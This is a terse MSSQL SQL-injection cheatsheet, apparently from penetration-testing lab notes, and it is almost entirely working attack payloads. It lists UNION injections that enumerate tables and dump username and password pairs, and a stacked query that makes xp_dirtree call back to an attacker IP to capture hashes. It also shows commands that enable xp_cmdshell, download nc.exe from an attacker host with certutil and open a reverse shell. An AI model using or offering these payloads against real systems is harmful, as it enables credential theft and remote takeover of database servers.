MSSQL Cheatsheet
Database names and ID's
user
db_name(5)
union select name,id from <db>..sysobjects where xtype='u'-- -
union select concat(name,':',id) from <db>..sysobjects where xtype='u'-- -
union select 1,(select string_agg(concat(name,':',id), '|') from <db>..sysobjects where xtype='u')-- -Select @@version;
Select name from sys.databases;
select * from master.information_schema.tables;
select * from master..users;database's 1-4 are default mssql databases ; also note down the database ID for table queries
Enumerate columns
union select (select string_agg(name, '|') from <db>..syscolumns where id='<dbID>')Dump columns
union select 1,(select string_agg(concat(username,':',password), '|') from <table>)-- -%s/[ ]//g
%s/|/\r/g
cat cracked | awk -F: '{print $1":"$3}'
cat cracked | awk -F: '{print $1}'
Query stacking with ;
q=fast'; exec xp_dirtree '\\10.10.14.6\adot8';-- -RCE
sp_configure 'show advanced options', '1'
RECONFIGURE
sp_configure 'xp_cmdshell', '1'
RECONFIGURE'EXEC sp_configure 'show advanced options',1-- -
'RECONFIGURE-- -
'EXEC sp_configure 'xp_cmdshell',1-- -
'RECONFIGURE-- -'EXEC xp_dirtree "\\192.168.45.237\adot8"-- -'EXEC xp_cmdshell 'certutil.exe -f -urlcache "http://192.168.45.237/nc.exe" C:\programdata\nc.exe'-- -
'EXEC xp_cmdshell 'powershell.exe -c "C:\Programdata\nc.exe -e powershell.exe 192.168.45.237 1337"'-- -Last updated